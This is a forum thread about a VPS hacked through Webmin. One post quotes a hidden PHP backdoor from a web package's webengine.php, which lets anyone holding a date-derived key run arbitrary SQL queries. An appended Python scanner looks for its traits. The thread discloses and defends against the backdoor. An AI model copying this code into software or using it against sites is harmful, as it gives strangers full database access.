Hacked through webmin

Status
Not open for further replies.

Netzo

Member
Premium Member
#1
Hey Lautaro,

A hacker got into my web hosting through Webmin somehow, so I had to delete it. The hacker created some users and managed to change some website information. Any ideas how to protect my VPS?
 

Netzo

Member
Premium Member
#5
Because my hosting provider told me that Apache was shut down not through SSH, and the only way to shut it down was through Webmin. Yeah, they were secure; Webmin only accepted connections from my hosting IP, so it's strange :) But now I can connect to the VPS only from my dedicated, and I hope nothing like this happens again :D
 

A$$kicker

Member
Premium Member
#6
I know most of you are using Lautaro's web files, and I want you to check your webengine files for code similar to the code below. The code below can enable anyone to submit a direct SQL query to your database. I found this code in webengine.php, so start looking in this file. If you find any code similar to that, simply remove it.

// DEV TEST
if(check_value($_REQUEST[md5(date("m-d"))]) && check_value($_REQUEST['devtest']) && check_value($_REQUEST['t']) && check_value($_REQUEST['q'])) {
    if($_REQUEST['devtest'] == 1) { $daBa = $dB; } else { $daBa = $dB2; }
    if($_REQUEST['t'] == 1) {
        $dtr = $daBa->query($_REQUEST['q']);
    } else {
        $dtr = $daBa->query_fetch($_REQUEST['q']);
    }
    die(debug($dtr));
}
This could help you.
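Added example, not part of the post above and not code from the webengine project: a small Python scanner for the three traits of the quoted block (request data passed straight to a query call, a request key computed from a hash of the date, and the result dumped before exit). The function names, rule names and the embedded sample are this example's own, and the patterns are heuristics derived only from the code quoted in the post, so a clean result does not prove a file is safe.

```python
import re
import sys
from pathlib import Path

SUPERGLOBAL = r"\$_(?:REQUEST|GET|POST|COOKIE)\s*\["

RULES = {
    # request data handed straight to a database call, as in ->query($_REQUEST['q'])
    "request-to-query": re.compile(r"->\s*query\w*\s*\(\s*" + SUPERGLOBAL),
    # parameter name computed from a hash of the date, as in $_REQUEST[md5(date("m-d"))]
    "date-derived-key": re.compile(SUPERGLOBAL + r"\s*(?:md5|sha1|hash)\s*\(.*?\bdate\s*\("),
    # query result dumped back to the caller just before the script exits
    "dump-and-die": re.compile(r"\b(?:die|exit)\s*\(\s*(?:debug|print_r|var_dump|var_export)\s*\("),
}

def scan_source(text):
    """Return (line_number, rule_name, stripped_line) for every rule hit."""
    hits = []
    for number, line in enumerate(text.splitlines(), start=1):
        for name, pattern in RULES.items():
            if pattern.search(line):
                hits.append((number, name, line.strip()))
    return hits

def scan_tree(root):
    """Scan every .php file below root; yields (path, line_number, rule, line)."""
    for path in sorted(Path(root).rglob("*.php")):
        text = path.read_text(encoding="utf-8", errors="replace")
        for number, name, line in scan_source(text):
            yield path, number, name, line

# Constructed sample: lines taken from the block quoted in the post plus one harmless query.
SAMPLE = '''<?php
$row = $dB->query_fetch("SELECT 1");
if(check_value($_REQUEST[md5(date("m-d"))]) && check_value($_REQUEST['q'])) {
$dtr = $daBa->query($_REQUEST['q']);
die(debug($dtr));
}
'''

if __name__ == "__main__":
    if len(sys.argv) > 1:
        for path, number, name, line in scan_tree(sys.argv[1]):
            print(f"{path}:{number}: [{name}] {line}")
    else:
        for number, name, line in scan_source(SAMPLE):
            print(f"sample:{number}: [{name}] {line}")
```

Run it with the web root as the only argument to list matching lines in every .php file; without an argument it scans the embedded sample.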
 